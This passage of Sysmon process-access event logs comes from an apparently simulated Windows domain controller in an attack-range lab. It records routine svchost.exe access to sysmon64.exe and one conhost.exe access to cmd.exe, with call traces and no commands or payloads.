07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010725C0500}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
